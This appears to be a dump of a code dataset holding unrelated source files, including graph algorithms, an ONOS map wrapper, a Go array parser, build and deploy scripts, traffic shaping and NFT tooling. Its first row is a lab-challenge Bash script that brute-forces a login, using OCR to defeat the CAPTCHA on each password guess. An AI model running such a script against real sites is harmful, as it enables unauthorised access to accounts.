text stringlengths 1 1.05M |
|---|
#! /bin/bash
# CAPTCHA login exercise for the hacking-lab.com training challenge: tries each
# candidate password from passwords.txt, solving the numeric CAPTCHA with gocr.
# NOTE(review): the PHPSESSID is a fixed lab session id; if the session expires
# every request will fail the same way and the loop never matches.
for i in $(cat passwords.txt); do
# Fetch a fresh CAPTCHA image bound to the current session.
curl -H "Cookie: PHPSESSID=bds5lud0ln9tghgsb2detk9na6" -s http://captcha.hacking-lab.com/captcha.php > captcha.gif
# OCR the image, digits only (-C "0-9"), using the trained glyph database db.pics.
captcha=$(gocr -C "0-9" -m 130 captcha.gif -p db.pics)
# Submit the login form with the candidate password and the OCR'd CAPTCHA value.
temp=$(curl -s -d "formID=31503373534448&username=hacker10&website=&simple_spc=31503373534448-31503373534448&q3_requestid=0&password=$i&norobot=$captcha" \
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" \
-H "Referer: http://captcha.hacking-lab.com/login2.php" \
-H "Cookie: PHPSESSID=bds5lud0ln9tghgsb2detk9na6" \
-H "Connection:keep-alive" \
-H "application/x-www-form-urlencoded" \
-H "Origin: http://captcha.hacking-lab.com" \
-H "Host: captcha.hacking-lab.com" \
-H "DNT: 1" \
http://captcha.hacking-lab.com/restricted2.php
)
echo "hello $temp"
# Wrong password -> next candidate. "was not loaded" means the CAPTCHA OCR
# failed; NOTE(review): this also skips to the next candidate instead of
# retrying the same password with a new CAPTCHA.
if echo $temp | grep "Username is unknown or password is wrong!" >/dev/null; then
continue
elif echo $temp | grep "was not loaded" >/dev/null; then
continue
else
echo "it is" $i
break
fi
done
|
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.Queue;
public class CCBFS {
    private Graph G;
    // visited[v] holds the component id of vertex v, or -1 while undiscovered.
    private int[] visited;
    private int ccount = 0;
    // Vertices in the order BFS dequeued them.
    private ArrayList<Integer> order = new ArrayList<>();

    /**
     * Computes the connected components of G by running a BFS from every
     * vertex that has not yet been assigned a component id.
     */
    public CCBFS(Graph G) {
        this.G = G;
        int n = G.V();
        visited = new int[n];
        for (int v = 0; v < n; v++)
            visited[v] = -1;
        for (int v = 0; v < n; v++) {
            if (visited[v] < 0) {
                bfs(v, ccount);
                ccount++;
            }
        }
    }

    /** Labels every vertex reachable from s with the component id ccid. */
    private void bfs(int s, int ccid) {
        Queue<Integer> frontier = new LinkedList<>();
        frontier.add(s);
        visited[s] = ccid;
        while (!frontier.isEmpty()) {
            int cur = frontier.remove();
            order.add(cur);
            for (int next : G.adj(cur)) {
                if (visited[next] == -1) {
                    frontier.add(next);
                    visited[next] = ccid;
                }
            }
        }
    }

    /** Returns the vertex lists of all components, indexed by component id. */
    public ArrayList<Integer>[] components() {
        ArrayList<Integer>[] res = new ArrayList[ccount];
        for (int i = 0; i < ccount; i++)
            res[i] = new ArrayList<>();
        for (int v = 0; v < G.V(); v++)
            res[visited[v]].add(v);
        return res;
    }

    /** True when v and w were labelled with the same component id. */
    public boolean isConnected(int v, int w) {
        G.validateVertex(v);
        G.validateVertex(w);
        return visited[v] == visited[w];
    }

    /** Number of connected components found. */
    public int ccount() {
        return ccount;
    }

    public static void main(String[] args) {
        Graph g = new Graph("g.txt");
        CCBFS ccbfs = new CCBFS(g);
        System.out.println(ccbfs.ccount());
        ArrayList<Integer>[] comp = ccbfs.components();
        for (int ccid = 0; ccid < comp.length; ccid++) {
            StringBuilder line = new StringBuilder(ccid + " : ");
            for (int w : comp[ccid])
                line.append(w).append(" ");
            System.out.println(line);
        }
    }
}
|
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.store.primitives.impl;
import java.util.Collection;
import java.util.Map;
import java.util.Objects;
import java.util.Set;
import java.util.concurrent.CompletableFuture;
import java.util.stream.Collectors;
import org.onosproject.store.service.AsyncConsistentMap;
import org.onosproject.store.service.Versioned;
/**
 * {@link org.onosproject.store.service.AsyncConsistentMap} that doesn't allow null values.
 * <p>
 * Null values are emulated on top of the delegate map: writing a null value is
 * treated as a removal, and entries whose stored value is null are hidden from
 * reads, iteration and containment checks.
 */
public class NotNullAsyncConsistentMap<K, V> extends DelegatingAsyncConsistentMap<K, V> {

    // Note: the delegate is held by the superclass; no local copy is kept
    // (the previous private field was written but never read).
    public NotNullAsyncConsistentMap(AsyncConsistentMap<K, V> delegateMap) {
        super(delegateMap);
    }

    @Override
    public CompletableFuture<Boolean> containsValue(V value) {
        // Null is never considered present.
        if (value == null) {
            return CompletableFuture.completedFuture(false);
        }
        return super.containsValue(value);
    }

    @Override
    public CompletableFuture<Versioned<V>> get(K key) {
        // Hide entries whose stored value is a null tombstone.
        return super.get(key).thenApply(v -> v != null && v.value() == null ? null : v);
    }

    @Override
    public CompletableFuture<Versioned<V>> getOrDefault(K key, V defaultValue) {
        return super.getOrDefault(key, defaultValue).thenApply(v -> v != null && v.value() == null ? null : v);
    }

    @Override
    public CompletableFuture<Versioned<V>> put(K key, V value) {
        // Putting null is equivalent to removing the key.
        if (value == null) {
            return super.remove(key);
        }
        return super.put(key, value);
    }

    @Override
    public CompletableFuture<Versioned<V>> putAndGet(K key, V value) {
        // Putting null removes the entry; the "current" value is then null.
        if (value == null) {
            return super.remove(key).thenApply(v -> null);
        }
        return super.putAndGet(key, value);
    }

    @Override
    public CompletableFuture<Collection<Versioned<V>>> values() {
        // Filter out null tombstones left by the delegate.
        return super.values().thenApply(value -> value.stream()
            .filter(v -> v.value() != null)
            .collect(Collectors.toList()));
    }

    @Override
    public CompletableFuture<Set<Map.Entry<K, Versioned<V>>>> entrySet() {
        return super.entrySet().thenApply(entries -> entries.stream()
            .filter(e -> e.getValue().value() != null)
            .collect(Collectors.toSet()));
    }

    @Override
    public CompletableFuture<Versioned<V>> putIfAbsent(K key, V value) {
        if (value == null) {
            return super.remove(key);
        }
        return super.putIfAbsent(key, value);
    }

    @Override
    public CompletableFuture<Boolean> remove(K key, V value) {
        // remove(key, null) can never match a visible entry.
        if (value == null) {
            return CompletableFuture.completedFuture(false);
        }
        return super.remove(key, value);
    }

    @Override
    public CompletableFuture<Boolean> remove(K key, long version) {
        return super.remove(key, version);
    }

    @Override
    public CompletableFuture<Versioned<V>> replace(K key, V value) {
        if (value == null) {
            return super.remove(key);
        }
        return super.replace(key, value);
    }

    @Override
    public CompletableFuture<Boolean> replace(K key, V oldValue, V newValue) {
        // A null oldValue means "replace only if absent": succeed when
        // putIfAbsent stored the new value (i.e. returned null).
        if (oldValue == null) {
            return super.putIfAbsent(key, newValue).thenApply(Objects::isNull);
        } else if (newValue == null) {
            // Replacing with null is a conditional removal.
            return super.remove(key, oldValue);
        }
        return super.replace(key, oldValue, newValue);
    }

    @Override
    public CompletableFuture<Boolean> replace(K key, long oldVersion, V newValue) {
        return super.replace(key, oldVersion, newValue);
    }
}
|
package parser
import (
"bytes"
"excelc/errors"
"strings"
"unicode"
)
// Array is the IType implementation for array-valued cells; Inner is the
// element type of the array.
type Array struct {
	typeBase
	Inner IType
}

// Name returns the canonical type name.
func (t *Array) Name() string {
	return "array"
}

// Layout describes the type's shape for display purposes.
func (t *Array) Layout() string {
	return "Type[]"
}

// Tag returns the wire tag written before marshalled array data.
func (t *Array) Tag() byte {
	return tagArray
}

// IsBase reports whether this is a primitive (non-composite) type.
func (t *Array) IsBase() bool {
	return false
}

// BeKey reports whether the type may be used as a map/sheet key.
func (t *Array) BeKey() bool {
	return false
}

// BeArr reports whether the type is an array.
func (t *Array) BeArr() bool {
	return true
}

// BeEnum reports whether the type is an enum.
func (t *Array) BeEnum() bool {
	return false
}

// Parse is a no-op: arrays need no extra type-declaration parsing.
func (t *Array) Parse(sht *Sheet, s string) error {
	return nil
}
// Value parses the cell text s0 (optionally wrapped in [ ]) into a slice of
// element values. Base element types are split on commas; composite element
// types are scanned rune by rune with bracket-depth tracking so commas inside
// nested {...}/[...] do not split elements.
func (t *Array) Value(sht *Sheet, s0 string) (interface{}, error) {
	s := TrimQuote(s0, '[', ']')
	if s == "" {
		return []interface{}{}, nil
	}
	res := make([]interface{}, 0, 3)
	if t.Inner.IsBase() {
		// Base element type: no nesting is possible, a plain split suffices.
		for _, e := range strings.Split(s, ",") {
			v, err := t.Inner.Value(sht, strings.TrimSpace(e))
			if err != nil {
				return nil, err
			}
			if err = psr.validate(t.Inner, v); err != nil {
				return nil, err
			}
			res = append(res, v)
		}
		return res, nil
	}
	// Composite element type: the synthetic trailing comma guarantees the
	// final element is flushed by the comma branch below.
	s += ","
	bracket := make([]rune, 0)
	express := make([]rune, 0)
	for _, char := range []rune(s) {
		if unicode.IsSpace(char) {
			continue
		}
		if char == '{' || char == '[' {
			bracket = append(bracket, char)
			express = append(express, char)
			continue
		}
		if char == '}' || char == ']' {
			if len(bracket) == 0 {
				return nil, errors.ErrBracketNotMatch(s0, char)
			}
			// Reject mismatched pairs such as "{]" or "[}", which the
			// depth counter alone would silently accept.
			open := bracket[len(bracket)-1]
			if (char == '}' && open != '{') || (char == ']' && open != '[') {
				return nil, errors.ErrBracketNotMatch(s0, char)
			}
			bracket = bracket[:len(bracket)-1]
			express = append(express, char)
			continue
		}
		if char == ',' && len(bracket) == 0 {
			// Top-level comma: the accumulated expression is one element.
			vv, err := t.Inner.Value(sht, string(express))
			if err != nil {
				return nil, err
			}
			res = append(res, vv)
			express = express[:0]
			continue
		}
		express = append(express, char)
	}
	if len(bracket) != 0 {
		// Report against the original input s0, not the mutated copy s
		// (which carries the synthetic trailing comma).
		return nil, errors.ErrBracketNotMatch(s0, bracket[0])
	}
	return res, nil
}
// Valid returns the validation rule string; arrays carry none themselves
// (element validation is delegated to the inner type).
func (t *Array) Valid() string {
	return ""
}

// Zero returns the zero value for an array cell: an empty slice.
func (t *Array) Zero() interface{} {
	return []interface{}{}
}
// Marshal encodes v (a []interface{}) as: array tag, element-type tag,
// element count, then each element marshalled by the inner type.
func (t *Array) Marshal(v interface{}) ([]byte, error) {
	items := v.([]interface{})
	var buf bytes.Buffer
	if err := writeTag(&buf, t.Tag()); err != nil {
		return nil, err
	}
	if err := writeTag(&buf, t.Inner.Tag()); err != nil {
		return nil, err
	}
	if err := writeLen(&buf, len(items)); err != nil {
		return nil, err
	}
	for _, item := range items {
		encoded, err := t.Inner.Marshal(item)
		if err != nil {
			return nil, err
		}
		if _, err = buf.Write(encoded); err != nil {
			return nil, err
		}
	}
	return buf.Bytes(), nil
}
// Reader returns the type used when reading values back; arrays read as themselves.
func (t *Array) Reader() IType {
	return t
}
|
#!/bin/bash
# The shebang must be bash: this script uses bash-only features (`function`,
# arrays, `set -o pipefail`, the ERR trap) that fail under POSIX sh/dash.
set -e
set -u
set -o pipefail

# Report the failing line number before the ERR trap aborts the script.
function on_error {
  echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}

trap 'on_error $LINENO' ERR

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies the contents of directory $1 into $2 with rsync, protecting other
# targets' in-flight temp files and skipping VCS metadata directories.
copy_dir()
{
local source="$1"
local destination="$2"
# Use filter instead of exclude so missing patterns don't throw errors.
# NOTE(review): the echoed command shows "${source}*" while the executed one
# uses "${source}"/* -- the echo is informational only.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" \"${source}*\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" "${source}"/* "${destination}"
}
# Result variable for select_slice: the chosen slice path, or "" if none matched.
SELECT_SLICE_RETVAL=""

# Picks the .xcframework slice whose folder name matches every architecture in
# $ARCHS and the current platform variant (simulator / maccatalyst / device).
select_slice() {
local paths=("$@")
# Locate the correct slice of the .xcframework for the current architectures
local target_path=""
# Split archs on space so we can find a slice that has all the needed archs
local target_archs=$(echo $ARCHS | tr " " "\n")
local target_variant=""
if [[ "$PLATFORM_NAME" == *"simulator" ]]; then
target_variant="simulator"
fi
if [[ ! -z ${EFFECTIVE_PLATFORM_NAME+x} && "$EFFECTIVE_PLATFORM_NAME" == *"maccatalyst" ]]; then
target_variant="maccatalyst"
fi
for i in ${!paths[@]}; do
local matched_all_archs="1"
for target_arch in $target_archs
do
# Verifies that the path contains the variant string (simulator or maccatalyst) if the variant is set.
# (When target_variant is empty, the *""* pattern matches any path, so this check is a no-op.)
if ! [[ "${paths[$i]}" == *"$target_variant"* ]]; then
matched_all_archs="0"
break
fi
# Conversely, when no variant is requested, reject variant-specific slices.
if [[ -z "$target_variant" && ("${paths[$i]}" == *"simulator"* || "${paths[$i]}" == *"maccatalyst"*) ]]; then
matched_all_archs="0"
break
fi
# This regex matches all possible variants of the arch in the folder name:
# Let's say the folder name is: ios-armv7_armv7s_arm64_arm64e/CoconutLib.framework
# We match the following: -armv7_, _armv7s_, _arm64_ and _arm64e/.
# If we have a specific variant: ios-i386_x86_64-simulator/CoconutLib.framework
# We match the following: -i386_ and _x86_64-
# When the .xcframework wraps a static library, the folder name does not include
# any .framework. In that case, the folder name can be: ios-arm64_armv7
# We also match _armv7$ to handle that case.
local target_arch_regex="[_\-]${target_arch}([\/_\-]|$)"
if ! [[ "${paths[$i]}" =~ $target_arch_regex ]]; then
matched_all_archs="0"
break
fi
done
if [[ "$matched_all_archs" == "1" ]]; then
# Found a matching slice
echo "Selected xcframework slice ${paths[$i]}"
SELECT_SLICE_RETVAL=${paths[$i]}
break
fi
done
}
# Locates the slice of an .xcframework matching the current build and copies it
# into the Pods xcframeworks build dir.
# Args: basepath, product name, package type, candidate slice folder names...
install_xcframework() {
local basepath="$1"
local name="$2"
local package_type="$3"
local paths=("${@:4}")
# Locate the correct slice of the .xcframework for the current architectures
select_slice "${paths[@]}"
local target_path="$SELECT_SLICE_RETVAL"
# No matching slice is only a warning: the build may still succeed for other targets.
if [[ -z "$target_path" ]]; then
echo "warning: [CP] Unable to find matching .xcframework slice in '${paths[@]}' for the current build architectures ($ARCHS)."
return
fi
local source="$basepath/$target_path"
local destination="${PODS_XCFRAMEWORKS_BUILD_DIR}/${name}"
if [ ! -d "$destination" ]; then
mkdir -p "$destination"
fi
copy_dir "$source/" "$destination"
echo "Copied $source to $destination"
}
# Install the single vendored xcframework for this Pods target.
install_xcframework "${PODS_ROOT}/PayUIndia-CheckoutPro/PayUCheckoutProKit/PayUCheckoutProKit.xcframework" "PayUIndia-CheckoutPro" "framework" "ios-x86_64-simulator" "ios-arm64"
|
package com.nostalgia.aws;
// Holds the CloudFront settings used to build signed URLs.
// NOTE(review): values are redacted placeholders; supply real configuration
// before use, ideally from the environment rather than source.
public class AWSConfig {
// CloudFront distribution domain serving the content.
public String distributionDomain = "REDACTED.cloudfront.net";
// CloudFront key pair id for URL signing.
public String keyPairId = "REDACTED";
}
|
<reponame>ruwen1984/code-of-python
# Bind two strings, echo each, then print a divider.
x = "a"
y = "b"
for value in (x, y):
    print(value)
print('--------')
|
<gh_stars>100-1000
/*
Copyright 2015 The Kubernetes Authors All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package benchmark
import (
"fmt"
"testing"
"time"
)
// TestSchedule100Node3KPods schedules 3k pods on 100 nodes (~30 pods/node).
func TestSchedule100Node3KPods(t *testing.T) {
	schedulePods(100, 3000)
}
// TestSchedule1000Node30KPods schedules 30k pods on 1000 nodes (~30 pods/node).
func TestSchedule1000Node30KPods(t *testing.T) {
	schedulePods(1000, 30000)
}
// schedulePods schedules specific number of pods on specific number of nodes.
// This is used to learn the scheduling throughput on various
// sizes of cluster and changes as more and more pods are scheduled.
// It won't stop until all pods are scheduled.
func schedulePods(numNodes, numPods int) {
	schedulerConfigFactory, destroyFunc := mustSetupScheduler()
	defer destroyFunc()
	c := schedulerConfigFactory.Client
	// Create the synthetic cluster and all pending pods up front.
	makeNodes(c, numNodes)
	makePods(c, numPods)
	prev := 0 // pods scheduled as of the previous poll, used for the per-second rate
	start := time.Now()
	// Poll once per second until every pod has been scheduled.
	for {
		// This can potentially affect performance of scheduler, since List() is done under mutex.
		// Listing 10000 pods is an expensive operation, so running it frequently may impact scheduler.
		// TODO: Setup watch on apiserver and wait until all pods scheduled.
		scheduled := schedulerConfigFactory.ScheduledPodLister.Store.List()
		// Columns: elapsed seconds, pods scheduled since last poll, total scheduled.
		fmt.Printf("%ds\trate: %d\ttotal: %d\n", time.Since(start)/time.Second, len(scheduled)-prev, len(scheduled))
		if len(scheduled) >= numPods {
			return
		}
		prev = len(scheduled)
		time.Sleep(1 * time.Second)
	}
}
|
<gh_stars>0
// Use CommonJS require() throughout: the original mixed an ES-module `import`
// with a CommonJS `module.exports`, which is invalid in either module system.
const express = require('express');

let authRouter = express.Router();

// Factory returning the auth router with its routes registered.
// NOTE(review): routes are re-registered on every call because the router is
// module-level -- call this once, or move Router() creation inside. Behavior
// kept as-is to avoid changing callers.
const router = function () {
    authRouter.route('/signup')
        .post(function (req, res) {
            console.log(req.body);
            res.send('hi');
        });
    return authRouter;
};

module.exports = router;
|
# Shapes outbound traffic on port 7227 (Bitcoin-like protocol) to ${LIMIT}
# using an HTB qdisc, while traffic to the local network stays unshaped.
# Packets are marked 0x2 by iptables and steered into the limited class 1:11.
#network interface on which to limit traffic
IF="eth0"
#limit of the network interface in question
LINKCEIL="1gbit"
#limit outbound Bitcoin protocol traffic to this rate
LIMIT="160kbit"
#defines the address space for which you wish to disable rate limiting
LOCALNET="192.168.0.0/16"
#delete existing rules (errors harmlessly if no qdisc is attached yet)
tc qdisc del dev ${IF} root
#add root class
tc qdisc add dev ${IF} root handle 1: htb default 10
#add parent class
tc class add dev ${IF} parent 1: classid 1:1 htb rate ${LINKCEIL} ceil ${LINKCEIL}
#add our two classes. one unlimited, another limited
tc class add dev ${IF} parent 1:1 classid 1:10 htb rate ${LINKCEIL} ceil ${LINKCEIL} prio 0
tc class add dev ${IF} parent 1:1 classid 1:11 htb rate ${LIMIT} ceil ${LIMIT} prio 1
#add handles to our classes so packets marked with <x> go into the class with "... handle <x> fw ..."
tc filter add dev ${IF} parent 1: protocol ip prio 1 handle 1 fw classid 1:10
tc filter add dev ${IF} parent 1: protocol ip prio 2 handle 2 fw classid 1:11
#delete any existing rules
#disable for now
#ret=0
#while [ $ret -eq 0 ]; do
#	iptables -t mangle -D OUTPUT 1
#	ret=$?
#done
#limit outgoing traffic to and from port 7227. but not when dealing with a host on the local network
#   (defined by $LOCALNET)
#   --set-mark marks packages matching these criteria with the number "2"
#   these packages are filtered by the tc filter with "handle 2"
#   this filter sends the packages into the 1:11 class, and this class is limited to ${LIMIT}
iptables -t mangle -A OUTPUT -p tcp -m tcp --dport 7227 ! -d ${LOCALNET} -j MARK --set-mark 0x2
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 7227 ! -d ${LOCALNET} -j MARK --set-mark 0x2
|
<filename>raigad-es-extensions/src/main/java/org/elasticsearch/discovery/custom/ElasticsearchUtil.java<gh_stars>0
/**
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.elasticsearch.discovery.custom;
import org.elasticsearch.common.logging.ESLogger;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class ElasticsearchUtil
{
    private static final String TOP_LEVEL_ELEMENT = "instances";
    private static final String HOST_NAME = "host_name";
    private static final String ID = "id";
    private static final String APP_NAME = "app_name";
    private static final String INSTANCE_ID = "instance_id";
    private static final String AVAILABILITY_ZONE = "availability_zone";
    private static final String PUBLIC_IP = "public_ip";
    private static final String DC = "dc";
    private static final String UPDATE_TIME = "update_time";

    /**
     * Parses a JSON instance listing into RaigadInstance beans.
     *
     * @param jsonInstances JSON document whose "instances" element maps an
     *                      instance key to a map of instance attributes
     * @param logger        logger for per-instance progress and parse failures
     * @return the parsed instances; empty when the document cannot be parsed
     *         or the "instances" element is missing
     */
    @SuppressWarnings("unchecked")
    public static List<RaigadInstance> getRaigadInstancesFromJsonString(String jsonInstances, ESLogger logger)
    {
        List<RaigadInstance> raigadInstances = new ArrayList<>();
        try {
            JsonPath jsonPath = new JsonPath(jsonInstances);
            Map<String, Object> topLevelInstanceMap = (Map<String, Object>) jsonPath.jsonMap.get(TOP_LEVEL_ELEMENT);
            // Guard against a missing "instances" element; previously this
            // escaped as an uncaught NullPointerException.
            if (topLevelInstanceMap == null) {
                logger.error("Missing '" + TOP_LEVEL_ELEMENT + "' element in instance JSON");
                return raigadInstances;
            }
            // Iterate entries directly instead of keySet()+get(): one lookup
            // per instance instead of two.
            for (Map.Entry<String, Object> entry : topLevelInstanceMap.entrySet())
            {
                Map<String, Object> instParamMap = (Map<String, Object>) entry.getValue();
                RaigadInstance raigadInstance = new RaigadInstance();
                raigadInstance.setApp((String) instParamMap.get(APP_NAME));
                raigadInstance.setAvailabilityZone((String) instParamMap.get(AVAILABILITY_ZONE));
                raigadInstance.setDC((String) instParamMap.get(DC));
                raigadInstance.setHostIP((String) instParamMap.get(PUBLIC_IP));
                raigadInstance.setHostName((String) instParamMap.get(HOST_NAME));
                raigadInstance.setId((String) instParamMap.get(ID));
                raigadInstance.setInstanceId((String) instParamMap.get(INSTANCE_ID));
                raigadInstance.setUpdatetime((Long) instParamMap.get(UPDATE_TIME));
                logger.info("EsInstance = ("+raigadInstance.toString()+")");
                //Add to the list
                raigadInstances.add(raigadInstance);
            }
        } catch (IOException e) {
            logger.error(" Error caught during Json Parsing", e);
        }
        return raigadInstances;
    }
}
|
from bs4 import BeautifulSoup
def extractPackages(htmlCode):
    """Extract (title, color-class) pairs from ``<div class="package ...">`` blocks.

    Args:
        htmlCode: HTML document or fragment as a string.

    Returns:
        List of ``(package_title, package_color)`` tuples. ``package_color`` is
        ``None`` when the div carries no second CSS class; malformed package
        divs without an ``<h3 class="package-title">`` are skipped instead of
        raising AttributeError as before.
    """
    package_info = []
    soup = BeautifulSoup(htmlCode, 'html.parser')
    for div in soup.find_all('div', class_='package'):
        title_tag = div.find('h3', class_='package-title')
        if title_tag is None:
            # Malformed package block: no title element.
            continue
        classes = div.get('class', [])
        # Assumes the color class is the second class -- TODO confirm markup.
        package_color = classes[1] if len(classes) > 1 else None
        package_info.append((title_tag.text, package_color))
    return package_info
<filename>scripts/add_upgrade_path.js
const HDWalletProvider = require("truffle-hdwallet-provider")
const Web3 = require('web3')
const assets = require('../assets/deployed-assets.json');
const NFT_ABI = require('../build/contracts/Galaxia.json');
require('dotenv').config({ path: '../.env' });

// Required configuration, loaded from ../.env
const MNEMONIC = process.env.MNEMONIC
const INFURA_KEY = process.env.INFURA_KEY
const NFT_CONTRACT_ADDRESS = process.env.NFT_CONTRACT_ADDRESS
const OWNER_ADDRESS = process.env.OWNER_ADDRESS
const NETWORK = process.env.NETWORK

if (!MNEMONIC || !INFURA_KEY || !OWNER_ADDRESS || !NETWORK) {
    console.error("Please set a mnemonic, infura key, owner, network, and contract address.")
    // Exit non-zero so callers see the failure; a bare top-level `return`
    // (as before) ends the script with status 0.
    process.exit(1)
}
// Walks every minted token and registers an on-chain upgrade path whenever the
// deployed metadata URI differs from the local assets file and no upgrade
// path exists yet. Waits for 3 confirmations per transaction.
async function main() {
try {
const provider = new HDWalletProvider(MNEMONIC, `https://${NETWORK}.infura.io/v3/${INFURA_KEY}`)
const web3 = new Web3(provider)
if (NFT_CONTRACT_ADDRESS) {
const nftContract = new web3.eth.Contract(NFT_ABI.abi, NFT_CONTRACT_ADDRESS, { gasLimit: "1000000" });
let alreadyMinted = Number(await nftContract.methods.totalSupply().call());
// assets[] is assumed to be indexed by token id -- TODO confirm ordering.
for (let i = 0; i < alreadyMinted; i++) {
const nft = assets[i];
const ipfsHash = await nftContract.methods.ipfsURI(i).call();
const upgradeHash = web3.utils.soliditySha3(nft.id, nft.metadata);
const validUpgrade = await nftContract.methods.validURI(upgradeHash).call();
// Check that the metadata is different and that an upgrade path doesnt already exist
if (nft.metadata !== ipfsHash && !validUpgrade) {
console.log("asset ", nft.name , "old uri ", ipfsHash, " new uri ", nft.metadata);
const gasPrice = web3.utils.toWei('20', 'gwei');
// Estimate first, then pad by 21000 gas as a safety margin.
const gas = await nftContract.methods.addUpgradePath(nft.id, nft.metadata).estimateGas({ from: OWNER_ADDRESS });
const tx = await nftContract.methods.addUpgradePath(nft.id, nft.metadata)
.send({ from: OWNER_ADDRESS, gas: (gas + 21000), gasPrice: gasPrice })
// .once('transactionHash', function (hash) {
//   console.log("tx hash ", hash);
// })
// .once('receipt', function (receipt) {
//   // console.log("receipt ", receipt);
// })
.on('confirmation', function (confNumber, receipt) {
if (confNumber === 3) {
console.log("nft ", nft.name, " metadata can be upgraded by owner to ", nft.metadata);
return receipt;
}
})
.on('error', function (error) {
console.log(error);
process.exit(1);
})
// .then(function (receipt) {
//   // will be fired once the receipt is mined
//   console.log("receipt mined ", receipt);
//   return receipt;
// });
// if (tx) {
//   return;
// }
} else {
console.log("nft ", nft.name, " is already up to date");
}
}
process.exit();
}
} catch (err) {
console.log(err);
process.exit(1);
}
}
main() |
#!/bin/bash
# Deploy-on-change poller: merge origin/master into /root/deploy_fuku when the
# remote has new commits.

# Abort if the working copy is missing -- otherwise git would run in whatever
# directory the script was invoked from.
cd /root/deploy_fuku/ || exit 1
git fetch origin

# `git diff origin/master` prints nothing when we are already up to date.
if [[ -n "$(git diff origin/master)" ]]; then
    echo "change at $(date)"
    git merge origin/master
#else
#echo "No changes"
fi
|
#!/usr/bin/env bash
# Bootstrap the project: install node modules, create the database, run
# migrations, and seed initial data.

echo "[INFO] Setting up project please be patient..."

# Chain the steps so the final status reflects the whole pipeline; previously
# only the exit code of the last command (db:seed:all) was checked, so an
# earlier npm/createdb/migrate failure was reported as success.
# NOTE(review): createdb fails when the database already exists -- rerunning
# this script on an existing setup will now report an error.
if npm install \
    && createdb passport \
    && sequelize db:migrate \
    && sequelize db:seed:all; then
    echo "[INFO] Your project has been setup successfully run npm start to get started!"
else
    echo "[ERROR] Your project had some issues getting setup check the log for more details."
fi
|
package tree_search;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.Queue;
import java.util.StringTokenizer;
/**
 * @author minchoba  BOJ #1068: Tree
 *
 * Reads a tree of N nodes given as a parent list (-1 marks the root), removes
 * one node together with its subtree, and prints the number of remaining leaves.
 *
 * @see https://www.acmicpc.net/problem/1068/
 */
public class Boj1068 {
	private static final int IS_ROOT = 0;
	private static final int INF = 51;

	public static void main(String[] args) throws Exception {
		// Read input through a buffered reader.
		BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
		int N = Integer.parseInt(br.readLine());

		ArrayList<Integer>[] graph = new ArrayList[INF];
		for (int i = 0; i < INF; i++) {
			graph[i] = new ArrayList<>();
		}

		int root = 0;
		StringTokenizer st = new StringTokenizer(br.readLine());
		for (int i = 1; i < N + 1; i++) {
			int tmp = Integer.parseInt(st.nextToken()) + 1; // shift by +1 so the root marker -1 maps to 0
			graph[tmp].add(i); // store children under their parent for top-down traversal
			if (tmp == IS_ROOT) // remember which node is the root
				root = i;
		}

		int remove = Integer.parseInt(br.readLine()) + 1;
		// Detach the removed node from its parent. Each child occurs at most
		// once per parent list, so remove-by-value suffices; the previous
		// index loop could skip the element following a removal.
		for (int i = 1; i < N + 1; i++) {
			graph[i].remove(Integer.valueOf(remove));
		}
		// Drop the removed node's own children so its subtree is unreachable.
		graph[remove].clear();

		// Removing the root removes the whole tree: zero leaves remain.
		System.out.println(root == remove ? 0 : search(graph, N, remove, root));
	}

	/**
	 * BFS from start, counting leaf nodes and never descending into the
	 * removed node r.
	 */
	private static int search(ArrayList<Integer>[] tree, int N, int r, int start) {
		int cnt = 0;
		Queue<Integer> q = new LinkedList<>();
		q.offer(start);
		while (!q.isEmpty()) {
			int current = q.poll();
			if (tree[current].isEmpty()) { // no children left -> leaf
				cnt++;
			}
			for (int next : tree[current]) {
				if (next > 0 && next < N + 1 && next != r) {
					q.offer(next);
				}
			}
		}
		return cnt;
	}
}
|
#!/bin/bash
# Clear the container title on every Matroska file under the current directory.
# POSIX find requires an explicit start path; only GNU find tolerates its absence.
find . -name '*.mkv' -exec mkvpropedit {} --set "title=" \;
|
<reponame>hiroqn/zbzb
// Maps `add` over the given arguments.
// NOTE(review): Array.prototype.map invokes the callback as (value, index,
// array); if `add` is a two-argument adder this adds each value to its index
// rather than applying a fixed increment -- confirm intent.
var add = require('./math.js').add,
map = module.exports = function () {
